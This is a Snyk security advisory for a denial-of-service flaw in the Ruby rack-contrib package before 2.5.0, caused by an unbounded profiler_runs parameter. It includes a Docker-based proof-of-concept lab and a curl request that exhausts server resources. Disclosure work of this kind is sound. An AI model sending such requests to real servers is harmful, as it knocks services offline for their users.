Allocation of Resources Without Limits or Throttling Affecting rack-contrib package, versions <2.5.0


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.04% (11th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-RUBY-RACKCONTRIB-7148535
  • published 28 May 2024
  • disclosed 27 May 2024
  • credit Sim4n6

How to fix?

Upgrade rack-contrib to version 2.5.0 or higher.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the unconstrained value of the incoming profiler_runs parameter. An attacker can cause the server to allocate excessive resources, leading to a denial of service by sending crafted requests with large profiler_runs values.

PoC

config.ru file:

require 'rack'
require 'rack/contrib'

use Rack::Profiler # if ENV['RACK_ENV'] == 'development'

Define a Rack application

app = lambda do |env|

Your application logic goes here

[200, {}, ["Hello World"]] end

Run the Rack application

run app

A Dockerfile:

# Use the official Ruby image as a base
FROM ruby:latest

Set the working directory inside the container

WORKDIR /app

Copy the custom config.ru file into the container

COPY config.ru . COPY Gemfile .

Install rack and the gems needed to run the app

RUN bundle install

Expose the port that rackup will listen on

EXPOSE 9292

Run rackup when the container starts

ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"]

Health check

HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1

A Gemfile:

source 'https://rubygems.org'

gem 'rack', '> 2.0' gem 'rack-contrib', '> 2.4' gem 'rackup' gem 'ruby-prof'

A Docker compose:

services:
  app:
    build:
      context: .
    ports:
      - "9292:9292"

To run the PoC:

docker compose up --build

To exploit DoS:

curl  "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
8.6 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Changed
  • Confidentiality (C)
    None
  • Integrity (I)
    None
  • Availability (A)
    High